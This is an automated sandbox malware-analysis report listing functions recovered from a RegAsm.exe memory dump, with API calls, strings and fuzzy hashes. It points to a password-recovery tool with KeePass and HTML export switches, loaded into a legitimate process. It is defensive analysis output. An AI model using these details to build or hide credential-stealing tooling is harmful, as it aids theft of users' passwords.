                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                        • String ID:
                                                                        • API String ID: 1010922700-0
                                                                        • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                        • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                        • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                        • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                        Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                        • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                        • malloc.MSVCRT ref: 004186B7
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                        • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                        • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                        • malloc.MSVCRT ref: 004186FE
                                                                        • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@$FullNamePath$malloc$Version
                                                                        • String ID: |A
                                                                        • API String ID: 4233704886-1717621600
                                                                        • Opcode ID: 1faf5b3adde0534b18c985de7adb1a22e40c93e78ba7e986694d0cab48eb237a
                                                                        • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                        • Opcode Fuzzy Hash: 1faf5b3adde0534b18c985de7adb1a22e40c93e78ba7e986694d0cab48eb237a
                                                                        • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                        Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmp
                                                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                        • API String ID: 2081463915-1959339147
                                                                        • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                        • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                        • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                        • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                        Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 004121FF
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                        • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                        • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                        • SelectObject.GDI32(?,?), ref: 00412251
                                                                        • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                        • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                          • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                          • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                          • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                        • SetCursor.USER32(00000000), ref: 004122BC
                                                                        • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                        • memcpy.MSVCRT ref: 0041234D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                        • String ID:
                                                                        • API String ID: 1700100422-0
                                                                        • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                        • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                        • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                        • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                        Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetClientRect.USER32(?,?), ref: 004111E0
                                                                        • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                        • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                        • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                        • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                        • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                        • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                        • String ID:
                                                                        • API String ID: 552707033-0
                                                                        • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                        • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                        • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                        • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                        Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$_snwprintf
                                                                        • String ID: %%0.%df
                                                                        • API String ID: 3473751417-763548558
                                                                        • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                        • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                        • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                        • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                        Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                        • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                        • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                        • GetTickCount.KERNEL32 ref: 0040610B
                                                                        • GetParent.USER32(?), ref: 00406136
                                                                        • SendMessageW.USER32(00000000), ref: 0040613D
                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                        • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                        • String ID: A
                                                                        • API String ID: 2892645895-3554254475
                                                                        • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                        • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                        • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                        • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                        Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                          • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                          • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                          • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                          • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                        • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                        • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                        • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                        • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                        • memset.MSVCRT ref: 0040DA23
                                                                        • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                        • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                        • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                          • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                        • String ID: caption
                                                                        • API String ID: 973020956-4135340389
                                                                        • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                        • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                        • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                        • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                        Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                        • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$_snwprintf$wcscpy
                                                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                        • API String ID: 1283228442-2366825230
                                                                        • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                        • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                        • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                        • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                        Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • wcschr.MSVCRT ref: 00413972
                                                                        • wcscpy.MSVCRT ref: 00413982
                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                          • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                        • wcscpy.MSVCRT ref: 004139D1
                                                                        • wcscat.MSVCRT ref: 004139DC
                                                                        • memset.MSVCRT ref: 004139B8
                                                                          • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                          • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                        • memset.MSVCRT ref: 00413A00
                                                                        • memcpy.MSVCRT ref: 00413A1B
                                                                        • wcscat.MSVCRT ref: 00413A27
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                        • String ID: \systemroot
                                                                        • API String ID: 4173585201-1821301763
                                                                        • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                        • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                        • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                        • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                        Function 0041352F Relevance: 17.5, APIs: 1, Strings: 9, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                        • API String ID: 4139908857-2887671607
                                                                        • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                        • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                        • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                        • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                        Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                          • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                          • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                        • memcpy.MSVCRT ref: 0040C11B
                                                                        • strchr.MSVCRT ref: 0040C140
                                                                        • strchr.MSVCRT ref: 0040C151
                                                                        • _strlwr.MSVCRT ref: 0040C15F
                                                                        • memset.MSVCRT ref: 0040C17A
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                        • String ID: 4$h
                                                                        • API String ID: 4019544885-1856150674
                                                                        • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                        • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                        • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                        • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                        Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                        • String ID: 0$6
                                                                        • API String ID: 4066108131-3849865405
                                                                        • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                        • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                        • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                        • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                        Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004082EF
                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                        • memset.MSVCRT ref: 00408362
                                                                        • memset.MSVCRT ref: 00408377
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$ByteCharMultiWide
                                                                        • String ID:
                                                                        • API String ID: 290601579-0
                                                                        • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                        • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                        • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                        • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                        Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@$wcslen
                                                                        • String ID:
                                                                        • API String ID: 239872665-3916222277
                                                                        • Opcode ID: 6d2ace926fa1fd4fd0b6115da4c515e06a5da4cfb6d7fd53cc3c25480c37732e
                                                                        • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                        • Opcode Fuzzy Hash: 6d2ace926fa1fd4fd0b6115da4c515e06a5da4cfb6d7fd53cc3c25480c37732e
                                                                        • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                        Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpywcslen$_snwprintfmemset
                                                                        • String ID: %s (%s)$YV@
                                                                        • API String ID: 3979103747-598926743
                                                                        • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                        • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                        • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                        • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                        Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                        • wcslen.MSVCRT ref: 0040A6B1
                                                                        • wcscpy.MSVCRT ref: 0040A6C1
                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                        • wcscpy.MSVCRT ref: 0040A6DB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                        • String ID: Unknown Error$netmsg.dll
                                                                        • API String ID: 2767993716-572158859
                                                                        • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                        • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                        • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                        • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                        Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                        • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                        • database is already attached, xrefs: 0042F721
                                                                        • unable to open database: %s, xrefs: 0042F84E
                                                                        • out of memory, xrefs: 0042F865
                                                                        • database %s is already in use, xrefs: 0042F6C5
                                                                        • too many attached databases - max %d, xrefs: 0042F64D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpymemset
                                                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                        • API String ID: 1297977491-2001300268
                                                                        • Opcode ID: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                        • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                        • Opcode Fuzzy Hash: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                        • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                        Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                        • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                        • GetLastError.KERNEL32 ref: 004178FB
                                                                        • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$ErrorLastLockSleepUnlock
                                                                        • String ID:
                                                                        • API String ID: 3015003838-0
                                                                        • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                        • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                        • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                        • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                        Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
